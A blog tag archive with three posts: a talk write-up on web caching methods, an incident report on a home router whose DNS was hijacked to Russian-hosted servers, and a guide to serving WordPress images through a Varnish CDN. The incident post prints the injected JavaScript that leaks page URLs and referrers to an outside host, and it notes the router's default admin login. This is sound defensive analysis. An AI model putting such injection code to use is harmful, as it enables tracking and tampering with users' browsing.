Posts Tagged ‘cdn’

When to Cache, What to Cache, How to Cache

Tuesday, June 21st, 2011

This post is a version of the slideshow presentation I did at Hack and Tell in Fort Lauderdale, Florida at The Collide Factory on Saturday, April 2, 2011. These are five-minute talks where each slide auto-advances after fifteen seconds, which limits the amount of detail that can be conveyed.

A brief introduction

What makes a page load quickly? While we can look at various metrics, quite a few things impact pageloads. Even when a page is served quickly, the design of the page often affects how it renders in the browser, which can make a site appear sluggish. Here, however, we're going to focus on the mechanics of what it takes to serve a page quickly.

The Golden Rule – do as few calculations as possible to hand content to your surfer.

But my site is dynamic!

Do you really need to calculate the last ten posts entered on your blog every time someone visits the page? Surely you could cache that and purge the cache when a new post is entered. When someone adds a new comment, purge the cache and let it be recalculated once.
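That purge-on-write pattern might look like the following minimal sketch, where a plain dict stands in for a shared cache such as memcached or Redis, and `fetch_from_db`/`insert_into_db` are hypothetical database helpers:

```python
# Hypothetical in-memory cache; in production this would be a shared
# store such as memcached or Redis so every app server sees the purge.
_cache = {}

def get_recent_posts(fetch_from_db):
    """Return the last ten posts, recalculating only on a cache miss."""
    if "recent_posts" not in _cache:
        _cache["recent_posts"] = fetch_from_db()
    return _cache["recent_posts"]

def add_post(post, insert_into_db):
    """Write the new post, then purge so the next read recalculates once."""
    insert_into_db(post)
    _cache.pop("recent_posts", None)
```

Comments work the same way: the handler writes, purges the key, and the next visitor pays the recalculation cost exactly once.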

But my site has user personalization!

Can that personalization be broken into its own section of the webpage? Or is it created by a cacheable function within your application? Even if you don't support fragment caching on the edge, you can emulate it by caching your expensive SQL queries or even portions of your page.

Even writing a generated file to a static file and allowing your webserver to serve that static file provides an enormous boost. This is what most of the caching plugins for WordPress do. However, they are page caching, not fragment caching, which means that the two most expensive queries that WordPress executes, Category list and Tag Cloud, are generated each time a new page is hit until that page is cached.
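As a sketch of that static-file approach (the path and `render` function here are hypothetical), the one trick worth knowing is to write the generated page atomically, so the webserver never serves a half-written file:

```python
from pathlib import Path

def publish_static(path, render):
    """Render a page once and write it under the webserver's docroot;
    the webserver then serves the file with no application code involved."""
    target = Path(path)
    target.parent.mkdir(parents=True, exist_ok=True)
    tmp = target.with_suffix(".tmp")
    tmp.write_text(render())
    tmp.replace(target)  # atomic rename: readers see old or new, never partial
```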

One of the challenges with high-performance sites is the never-ending quest to shrink Time to First Byte. Each load balancer or proxy in front adds some latency. It also means a page needs to be pre-constructed before it is served, or you need to do a little trickery. Unless you've got plenty of spare computing horsepower, this rules out doing much dynamic processing on the page if you want to hand a response back as quickly as possible.

With this, we’re left with a few options to have a dynamic site that has the performance of a statically generated site.

Amazon was one of the first to embrace the Page and Block method, using Mason, a mod_perl-based framework. Each of the blocks on the page was generated ahead of time, and only the personalized blocks were generated 'late'. This allowed the frontend to assemble the pieces, do minimal work to display the personal recommendations and present the page quickly.

Google took a different approach by having an immense amount of computing horsepower behind their results. Google’s method probably isn’t cost effective for most sites on the Internet.

Facebook developed Bigpipe, which generates the page shell and then dynamically loads portions of the page into the DOM. This makes the page load quickly, but in stages: the viewer sees the rough page immediately while the rest of the page fills in.

The Presentation begins here

Primary Goal

Fast Pageloads – We want the page to load quickly and render quickly so that the websurfer doesn’t abandon the site.

Increased Scalability – Once we get more traffic, we want the site to be able to scale and provide websurfers with a consistent, fast experience while the site grows.

Metrics We Use

Time to First Byte – This is a measure of how quickly the site responds to an incoming request and starts sending the first byte of data. Some sites have to take time to analyze the request, build the page, etc before sending any data. This lag results in the browser sitting there with a blank screen.

Time to Completion – We want the entire page to load quickly enough that the web surfer doesn’t abandon. While we can do some tricky things with chunked encoding to fool websurfers into thinking our page loads more quickly than it really does, for 95% of the sites, this is a decent metric.

Number of Requests – The total number of requests for a page is a good indicator of overall performance. Since most browsers will only fetch a handful of assets concurrently per hostname, we can use a CDN, embed images in CSS or use image sprites to reduce the number of requests.

Why Cache?

Expecting Traffic

When we have an advertising campaign or holiday promotion going on, we don't know what our traffic level might be, so we need to prepare by having caching in place.

Receiving Traffic

If we receive unexpected publicity, or our site is listed somewhere, we might cache to allow the existing system to survive a flood of traffic.

Fighting DDOS

When fighting a Distributed Denial of Service attack, we might use caching to keep the backend servers from getting overloaded.

Expecting Traffic

There are several types of caching we can do when we expect to receive traffic.

* Page Cache – Varnish/Squid/Nginx provide page caching. A static copy of the rendered page is held and updated from time to time either by the content expiring or being purged from the cache.
* Query Cache – MySQL includes a query cache that can help on repetitive queries.
* Wrap Queries with functions and cache – We can take our queries and write our own caching using a key/value store, saving us from having to hit the database backend.
* Wrap functions with caching – In Python, we can use Beaker to wrap a decorator around a function which does the caching magic for us. Other languages have similar facilities.
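The query-wrapping item in the list above can be sketched as follows; the dict stands in for a real key/value store such as memcached, and the cache key is derived from the query text plus its parameters. `run_query` is a hypothetical helper that actually executes the SQL:

```python
import hashlib

store = {}  # stand-in for memcached/Redis with get/set semantics

def cached_query(sql, params, run_query):
    """Return cached rows for (sql, params), hitting the database only once."""
    key = hashlib.sha1(repr((sql, params)).encode()).hexdigest()
    rows = store.get(key)
    if rows is None:
        rows = run_query(sql, params)
        store[key] = rows  # a real store would also take an expire time
    return rows
```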

Receiving Traffic

* Page Caching – When we’re receiving traffic, the easiest thing to do is to put a page cache in place to save the backend/database servers from getting overrun. We lose some of the dynamic aspects, but, the site remains online.

* Fragment Caching – With fragment caching, we can break the page into zones that have separate expiration times or can be purged separately. This can give us a little more control over how interactive and dynamic the site appears while it is receiving traffic.

DDOS Handling

* Slow Client/Vampire Attacks – Certain DDOS attacks cause problems with some webserver software. Recent versions of Apache and most event/poll driven webservers have protection against this.
* Massive Traffic – With some infrastructures, we’re able to filter out the traffic ahead of time – before it hits the backend.

Caching Easy, Purging Hard

Caching is scalable. We can just add more caching servers to the pool and keep scaling to handle increased load. The problem we run into is keeping a site interactive and dynamic as content needs to be updated: at that point, purging/invalidating cached pages or regions requires communicating with each cache.
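With Varnish, that per-cache communication is typically an HTTP PURGE request sent to every server in the pool. A rough sketch – the cache hostnames here are made up, and Varnish only honours PURGE if its VCL is configured to allow it:

```python
from http.client import HTTPConnection

# Hypothetical pool; every cache must be told about the invalidation,
# which is why purging gets harder as the pool grows.
CACHES = [("cache1.example.com", 80), ("cache2.example.com", 80)]

def purge(path, host="www.example.com"):
    """Send an HTTP PURGE for `path` to every cache; return status per cache."""
    results = {}
    for server, port in CACHES:
        conn = HTTPConnection(server, port, timeout=5)
        try:
            conn.request("PURGE", path, headers={"Host": host})
            results[(server, port)] = conn.getresponse().status
        except OSError:
            results[(server, port)] = None  # unreachable; retry or alert
        finally:
            conn.close()
    return results
```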

Page Caching

Some of the caching servers that work well are Varnish, Squid and Nginx. Each of these allows you to do page caching, specify expire times, and handle most requests without having to talk to the backend servers.

Fragment Caching

Edge Side Includes or a Page and Block construction allow you to cache pieces of the page individually. With this, we can expire pieces of the page independently and let our front-end cache, Varnish, reassemble the pieces to serve to the websurfer.

Cache Methods

* Hardware – Hard drives contain caches as do many controller cards.
* SQL Cache – Adding memory to keep the indexes in RAM or enabling the SQL query cache can help.
* Redis/Memcached – Using a key/value store can keep requests from hitting rotational media (disks).
* Beaker/Functional Caching – Either method can use a key/value store, preferably RAM-backed rather than disk-backed, to keep requests from having to hit the database backend.
* Edge/Frontend Caching – We can deploy a cache on the border to reduce the number of requests to the backend.

OS Buffering/Caching

* Hardware Caching on drive – Most hard drives today have caches – finding one with a large cache can help.
* Caching Controller – If you have a large ‘hot set’ of data that changes, a caching controller lets you put a gigabyte or more of RAM in front of the disk so requests don’t have to hit it. Make sure you get the battery-backup card in case your machine loses power – those disk writes are often reported as completed before they are physically written to the disk.
* Linux, FreeBSD, Solaris and Windows all use spare RAM for disk caching.

MySQL Query Cache

The MySQL Query cache is simple yet effective. It isn’t smart and doesn’t cache based on query plan, but, if your code base executes queries where the arguments are in the same order, it can be quite a plus. If you are dynamically creating queries, assembling the queries to try and keep the conditions in the same order will help.
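Because the query cache only matches byte-identical SQL, dynamically built queries benefit from emitting their conditions in a stable order. A small sketch of that assembly (the table and column names are made up):

```python
def build_query(filters):
    """Build a SELECT whose WHERE clauses are sorted by column name, so the
    same set of filters always produces byte-identical SQL that the MySQL
    query cache can match on repeat requests."""
    clauses, params = [], []
    for column in sorted(filters):  # the stable ordering is the point
        clauses.append("%s = %%s" % column)
        params.append(filters[column])
    sql = "SELECT id, title FROM posts"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return sql, params
```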


Redis/Memcached

* Key Value Store – You can store frequently requested data in memory.
* Nginx can read rendered pages directly from Memcached.

Both methods use RAM rather than hitting slower disk media.

Beaker/Functional Caching

With Python, we can use the Beaker decorator to specify caching. This insulates us from having to write our own handler.
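Under the hood, a Beaker-style cache decorator roughly amounts to the following simplified stand-in – this is not Beaker's actual implementation, which also handles storage backends, namespaces and locking:

```python
import functools
import time

def cached(expire=300, _store={}):
    """Memoize a function's result per argument tuple, with an expiry.
    A simplified stand-in for what Beaker's decorator provides."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args):
            key = (func.__name__, args)
            hit = _store.get(key)
            if hit is not None and time.monotonic() - hit[0] < expire:
                return hit[1]  # fresh cached value
            value = func(*args)
            _store[key] = (time.monotonic(), value)
            return value
        return wrapper
    return decorator
```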

Edge/Front End Caching

* Define blocks that can be cached, portions of the templates.
* Page Caching
* JSON (CouchDB) – Even JSON responses can run behind Varnish.
* Bigpipe – Cache the page shell and allow JavaScript to assemble the page.

Content Delivery Network (CDN)

When possible, use a Content Delivery Network to store static assets off-net. This adds a separate hostname, and sometimes a separate domain name, which allows most browsers to fetch more resources at the same time. Preferably you want a separate domain name that won’t have any cookies set, which cuts down on the size of the request the browser sends when fetching static assets.

Facebook’s Bigpipe

Facebook uses a technology called Bigpipe which caches the page template and the JavaScript required to build the page. Once that has loaded, JavaScript fetches the data and builds the page. Some of the JSON data requested is also cached, leading to a very compact page being loaded and built while you’re viewing it.

Google’s Answer

Google has spent many years building a tremendous distributed computer. When you request a site, their frontend servers use a deadline scheduler and request blocks from their advertising, personalization, search results and other page-block services. The page is then assembled and returned to the web surfer. If any block doesn’t complete quickly enough, it is left out of the assembly – which motivates the advertising department to make sure their block renders quickly.

What else can we do?

* Reduce the number of calculations required to serve a page
* Reduce the number of disk operations
* Reduce the network Traffic

In general, do as few calculations as possible while handing the page to the surfer.

Man in the Middle Attack

Sunday, October 10th, 2010

A few days ago a client had a window open up in their browser showing an IP address with his domain name as a query string parameter. He asked me if his WordPress site had been hacked. I took a look through the files on disk, dumped the database and did a grep, looked around the site using Chrome, Firefox and Safari, and saw nothing. I even used Firefox to view the generated source, since some scripts exploit the fact that jQuery is already loaded to pull in their extra payload through a template or addon.

Nothing. He runs a Mac, and his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but he said something that was very confusing: our iPads do it too.

There’s no Flash on the iPad, most toolbar code can’t be installed on the iPad due to its fairly tight sandbox, and the behavior was the same across multiple machines. Even machines that weren’t accessing his site were popping up windows/tabs in Safari.

I had him check his System Preferences, TCP/IP and the DNS settings, and he read off the numbers. The last one seemed odd, but wouldn’t normally cause an issue since it isn’t routed. The other two DNS server IPs were read off and written down. A reverse IP lookup resulted in a Not Found. Since he was on RoadRunner, I found that a bit odd, so I did a whois and found out that both of the IP addresses listed as DNS servers were hosted in Russia.

Now we’re getting somewhere. The settings on his machine were grabbed from DHCP, so his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page, and there they were. We modified the router to use Google’s resolvers and changed its password to something a little more secure.

We checked a few settings in the Linksys router; remote web access wasn’t enabled, so the only way it could have happened is a JavaScript exploit that logged into the router and made the changes. Now the fun began: figuring out what was actually being intercepted. Since I had a source site that I knew caused issues, some quick investigative work turned up a number of external URLs loaded on his site that might be common enough, and small enough, to be of interest. Since we know these particular scripts require jQuery, we can look at anything in his source that calls something external.

The first thought was the Twitter sidebar, but that calls Twitter directly, which means all of that traffic would have to be proxied – certainly not something you’d want with limited bandwidth. Feedburner seemed like a potential vector, but offered probably very limited access, and those were hrefs, so they would have had to be followed; the Feedburner widget wasn’t present anyway. Another script seemed like a reasonable target, but its DNS through the Russian DNS servers and through other resolvers was the same. That isn’t to say they couldn’t change it on a per-request basis to balance traffic, but we’re going on the assumption it’s a fire-and-forget operation.

Looking further, StatCounter could have been a suspect – it fits the criteria of a small JavaScript on a page that likely has jQuery – but again the DNS entries appeared to be the same.

However, the next entry, the Wibiya toolbar, appeared to be a good candidate: it requires jQuery and loads a small JavaScript file. Its DNS entries are different – though we could attribute that to the fact it is served from a CDN – but we get a CNAME from Google’s resolvers and an IN A record from the suspect DNS servers.

The Loader.js contains a tiny bit of extra code at the bottom:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + '';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';

I did a few checks to see if I could find any other hostnames they had filtered, but wasn’t able to find anything at a quick glance. Oh, and these guys minified the JavaScript – even though Wibiya didn’t. And no, the server hosting the content was in the USA; only the DNS server was outside the USA.

After years of reading about this type of attack, it is the first time I was able to witness it first-hand.

Converting to a Varnish CDN with WordPress

Sunday, October 11th, 2009

While working with Varnish, I decided to try an experiment. I knew that Varnish could assist sites, but it has never been easy to run Varnish on a shared virtual or clustered virtual host; VPS or dedicated servers are no problem because you can adjust the configuration. In this case, I wanted to see if we could use Varnish to emulate a CDN and, if so, how difficult that would be with WordPress.

As it turns out, WordPress has a capability built in that handles media uploads. In the admin, under Settings, Miscellaneous, there are two values: one asks where uploads should be stored, a path relative to your blog’s home directory; the second is the URL that points to that path. In most cases you leave the URL blank, but we can use it to point the image URLs at the CDN.

Settings, Miscellaneous

Store uploads in this folder: wp-content/uploads
Full URL path to files:

Second, all of the images that have already been posted need their URLs modified. Since I am a command-line guy, I executed the following command in MySQL.

update wp_posts set post_content=replace(post_content,'','');

According to the Yahoo YSlow plugin, my blog went from a 72 to a 98 out of 100 with this and a few other modifications. The site does appear to be much snappier as well.
